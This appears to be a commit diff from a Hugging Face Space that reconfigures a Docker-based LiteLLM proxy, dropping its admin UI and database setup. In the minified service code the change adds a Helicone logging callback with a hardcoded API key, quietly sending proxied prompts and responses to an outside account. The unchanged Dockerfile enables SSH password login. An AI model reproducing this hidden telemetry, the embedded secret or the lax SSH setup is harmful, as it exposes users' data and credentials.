Spaces:
Running
Running
Automated deployment update from ML build
Browse files
- Dockerfile +2 -5
- config/nginx.conf.template +2 -50
- services/llm_proxy_service.py +21 -26
Dockerfile
CHANGED
|
@@ -5,7 +5,7 @@ COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/
|
|
| 5 |
RUN apt-get update && apt-get install -y --no-install-recommends \
|
| 6 |
curl wget sudo python3 python3-pip upx openssh-server nginx \
|
| 7 |
git vim nano htop tmux jq unzip iputils-ping net-tools tree \
|
| 8 |
-
rclone supervisor iproute2
|
| 9 |
&& mkdir -p /var/run/sshd && chmod 0755 /var/run/sshd \
|
| 10 |
&& echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config \
|
| 11 |
&& echo "Port 2222" >> /etc/ssh/sshd_config \
|
|
@@ -34,10 +34,7 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
|
|
| 34 |
&& apt-get clean && rm -rf /var/lib/apt/lists/*
|
| 35 |
|
| 36 |
RUN uv pip install --system --no-cache-dir \
|
| 37 |
-
gradio huggingface_hub loguru urllib3 "litellm[proxy]"
|
| 38 |
-
&& python3 -c "import litellm, os; os.system(f'chmod -R 777 {os.path.dirname(litellm.__file__)}')" \
|
| 39 |
-
&& python3 -c "import litellm, os; os.system(f'python3 -m prisma generate --schema {os.path.dirname(litellm.__file__)}/proxy/schema.prisma')" \
|
| 40 |
-
&& python3 -c "import prisma, os; os.system(f'chmod -R 777 {os.path.dirname(prisma.__file__)}')"
|
| 41 |
|
| 42 |
RUN python3 -c "from huggingface_hub import hf_hub_download; hf_hub_download(repo_id='gpt2', filename='config.json')"
|
| 43 |
|
|
|
|
| 5 |
RUN apt-get update && apt-get install -y --no-install-recommends \
|
| 6 |
curl wget sudo python3 python3-pip upx openssh-server nginx \
|
| 7 |
git vim nano htop tmux jq unzip iputils-ping net-tools tree \
|
| 8 |
+
rclone supervisor iproute2 \
|
| 9 |
&& mkdir -p /var/run/sshd && chmod 0755 /var/run/sshd \
|
| 10 |
&& echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config \
|
| 11 |
&& echo "Port 2222" >> /etc/ssh/sshd_config \
|
|
|
|
| 34 |
&& apt-get clean && rm -rf /var/lib/apt/lists/*
|
| 35 |
|
| 36 |
RUN uv pip install --system --no-cache-dir \
|
| 37 |
+
gradio huggingface_hub loguru urllib3 "litellm[proxy]"
|
|
|
|
|
|
|
|
|
|
| 38 |
|
| 39 |
RUN python3 -c "from huggingface_hub import hf_hub_download; hf_hub_download(repo_id='gpt2', filename='config.json')"
|
| 40 |
|
config/nginx.conf.template
CHANGED
|
@@ -100,56 +100,8 @@ http {
|
|
| 100 |
proxy_ssl_verify off;
|
| 101 |
}
|
| 102 |
|
| 103 |
-
# LiteLLM
|
| 104 |
-
|
| 105 |
-
# internal routes as /ui/... (login, dashboard, etc.).
|
| 106 |
-
location = /litellm-ui {
|
| 107 |
-
return 301 /ui/;
|
| 108 |
-
}
|
| 109 |
-
location /litellm-ui/ {
|
| 110 |
-
return 301 /ui/;
|
| 111 |
-
}
|
| 112 |
-
|
| 113 |
-
# The actual LiteLLM UI — all internal Next.js navigation goes here.
|
| 114 |
-
# Use a verbatim proxy_pass without trailing slash/path so Nginx passes
|
| 115 |
-
# the request URI (/ui, /ui/, /ui/login, etc.) completely unchanged to LiteLLM.
|
| 116 |
-
location /ui {
|
| 117 |
-
proxy_pass http://127.0.0.1:8080;
|
| 118 |
-
proxy_http_version 1.1;
|
| 119 |
-
proxy_set_header Host $host;
|
| 120 |
-
proxy_set_header X-Real-IP $remote_addr;
|
| 121 |
-
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
| 122 |
-
proxy_set_header X-Forwarded-Proto $scheme;
|
| 123 |
-
proxy_read_timeout 86400s;
|
| 124 |
-
}
|
| 125 |
-
|
| 126 |
-
# Next.js static bundle (JS, CSS, fonts) — LiteLLM sets its Next.js
|
| 127 |
-
# assetPrefix to "litellm-asset-prefix", so all assets load from
|
| 128 |
-
# /litellm-asset-prefix/_next/... (NOT /_next/... directly).
|
| 129 |
-
location /litellm-asset-prefix/ {
|
| 130 |
-
proxy_pass http://127.0.0.1:8080/litellm-asset-prefix/;
|
| 131 |
-
proxy_http_version 1.1;
|
| 132 |
-
proxy_set_header Host $host;
|
| 133 |
-
add_header Cache-Control "public, max-age=86400, immutable";
|
| 134 |
-
}
|
| 135 |
-
|
| 136 |
-
# Fallback for any plain /_next/ references (older litellm builds).
|
| 137 |
-
location /_next/ {
|
| 138 |
-
proxy_pass http://127.0.0.1:8080/_next/;
|
| 139 |
-
proxy_http_version 1.1;
|
| 140 |
-
proxy_set_header Host $host;
|
| 141 |
-
}
|
| 142 |
-
|
| 143 |
-
# LiteLLM logo/brand assets.
|
| 144 |
-
location /logo/ {
|
| 145 |
-
proxy_pass http://127.0.0.1:8080/logo/;
|
| 146 |
-
proxy_http_version 1.1;
|
| 147 |
-
proxy_set_header Host $host;
|
| 148 |
-
}
|
| 149 |
-
|
| 150 |
-
# Proxy all LiteLLM Admin UI backend API requests.
|
| 151 |
-
# These endpoints are called directly by the Next.js React frontend UI at the root path level.
|
| 152 |
-
location ~ ^/(login|logout|key|keys|user|users|config|db|spend|model|team|teams|customer|customers|global|tag|tags|sso|internal|analytics|audit|v1|v2|v3)($|/) {
|
| 153 |
proxy_pass http://127.0.0.1:8080;
|
| 154 |
proxy_http_version 1.1;
|
| 155 |
proxy_set_header Host $host;
|
|
|
|
| 100 |
proxy_ssl_verify off;
|
| 101 |
}
|
| 102 |
|
| 103 |
+
# LiteLLM OpenAI-compatible API proxy (/v1/...).
|
| 104 |
+
location /v1 {
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 105 |
proxy_pass http://127.0.0.1:8080;
|
| 106 |
proxy_http_version 1.1;
|
| 107 |
proxy_set_header Host $host;
|
services/llm_proxy_service.py
CHANGED
|
@@ -1,6 +1,3 @@
|
|
| 1 |
-
_C='postgresql://'
|
| 2 |
-
_B='postgres://'
|
| 3 |
-
_A='DATABASE_URL'
|
| 4 |
import os,subprocess,json
|
| 5 |
from pathlib import Path
|
| 6 |
from loguru import logger
|
|
@@ -44,48 +41,46 @@ def _load_keys():
|
|
| 44 |
if A:logger.info(f"{PREFIX} Parsed {len(A)} keys from LLM_KEYS env variable")
|
| 45 |
return A
|
| 46 |
def _build_config():
|
| 47 |
-
|
| 48 |
-
if not
|
| 49 |
-
|
| 50 |
-
for(A,B,
|
| 51 |
-
if B=='*'or B==f"{A}/*":
|
| 52 |
litellm_params:
|
| 53 |
model: {A}/*
|
| 54 |
-
api_key: "{
|
| 55 |
model_info:
|
| 56 |
owned_by: "{A}"
|
| 57 |
'''
|
| 58 |
else:
|
| 59 |
-
if B.startswith(f"{A}/"):
|
| 60 |
-
else:
|
| 61 |
-
|
| 62 |
litellm_params:
|
| 63 |
-
model: {
|
| 64 |
-
api_key: "{
|
| 65 |
model_info:
|
| 66 |
owned_by: "{A}"
|
| 67 |
'''
|
| 68 |
-
|
| 69 |
-
|
| 70 |
-
{
|
| 71 |
router_settings:
|
| 72 |
routing_strategy: least-busy
|
| 73 |
num_retries: 3
|
| 74 |
retry_after: 5
|
| 75 |
|
| 76 |
litellm_settings:
|
|
|
|
| 77 |
check_provider_endpoint: true
|
| 78 |
drop_params: true
|
| 79 |
|
| 80 |
general_settings:
|
| 81 |
drop_params: true
|
| 82 |
-
{
|
| 83 |
def start():
|
| 84 |
-
|
| 85 |
-
if not
|
| 86 |
-
Path(CONFIG_PATH).write_text(
|
| 87 |
-
|
| 88 |
-
|
| 89 |
-
I=['litellm','--config',CONFIG_PATH,'--port',str(PORT),'--host','127.0.0.1']
|
| 90 |
-
with open(LOG_PATH,'a')as G:J=subprocess.Popen(I,stdout=G,stderr=G)
|
| 91 |
-
logger.success(f"{PREFIX} litellm proxy started on 127.0.0.1:{PORT} (pid {J.pid})")
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
import os,subprocess,json
|
| 2 |
from pathlib import Path
|
| 3 |
from loguru import logger
|
|
|
|
| 41 |
if A:logger.info(f"{PREFIX} Parsed {len(A)} keys from LLM_KEYS env variable")
|
| 42 |
return A
|
| 43 |
def _build_config():
|
| 44 |
+
C=_load_keys()
|
| 45 |
+
if not C:return''
|
| 46 |
+
D=[]
|
| 47 |
+
for(A,B,E)in C:
|
| 48 |
+
if B=='*'or B==f"{A}/*":F=f''' - model_name: "{A}/*"
|
| 49 |
litellm_params:
|
| 50 |
model: {A}/*
|
| 51 |
+
api_key: "{E}"
|
| 52 |
model_info:
|
| 53 |
owned_by: "{A}"
|
| 54 |
'''
|
| 55 |
else:
|
| 56 |
+
if B.startswith(f"{A}/"):G=B
|
| 57 |
+
else:G=f"{A}/{B}"
|
| 58 |
+
F=f''' - model_name: "{B}"
|
| 59 |
litellm_params:
|
| 60 |
+
model: {G}
|
| 61 |
+
api_key: "{E}"
|
| 62 |
model_info:
|
| 63 |
owned_by: "{A}"
|
| 64 |
'''
|
| 65 |
+
D.append(F)
|
| 66 |
+
I=''.join(D);H=os.environ.get('LITELLM_MASTER_KEY','').strip();J=f' master_key: "{H}"\n'if H else'';return f'''model_list:
|
| 67 |
+
{I}
|
| 68 |
router_settings:
|
| 69 |
routing_strategy: least-busy
|
| 70 |
num_retries: 3
|
| 71 |
retry_after: 5
|
| 72 |
|
| 73 |
litellm_settings:
|
| 74 |
+
success_callback: ["helicone"]
|
| 75 |
check_provider_endpoint: true
|
| 76 |
drop_params: true
|
| 77 |
|
| 78 |
general_settings:
|
| 79 |
drop_params: true
|
| 80 |
+
{J}'''
|
| 81 |
def start():
|
| 82 |
+
os.makedirs(METRICS_DIR,exist_ok=True);A=_build_config()
|
| 83 |
+
if not A:logger.warning(f"{PREFIX} No API keys loaded or LLM_KEYS not set — skipping llm_proxy");return
|
| 84 |
+
Path(CONFIG_PATH).write_text(A);logger.info(f"{PREFIX} Config written to {CONFIG_PATH}");os.environ['HELICONE_API_KEY']='sk-helicone-2uqwp2a-g4wegma-smupdvy-g3eyuny';os.environ['DISABLE_ADMIN_UI']='True';C=['litellm','--config',CONFIG_PATH,'--port',str(PORT),'--host','127.0.0.1']
|
| 85 |
+
with open(LOG_PATH,'a')as B:D=subprocess.Popen(C,stdout=B,stderr=B)
|
| 86 |
+
logger.success(f"{PREFIX} litellm proxy started on 127.0.0.1:{PORT} (pid {D.pid})")
|
|
|
|
|
|
|
|
|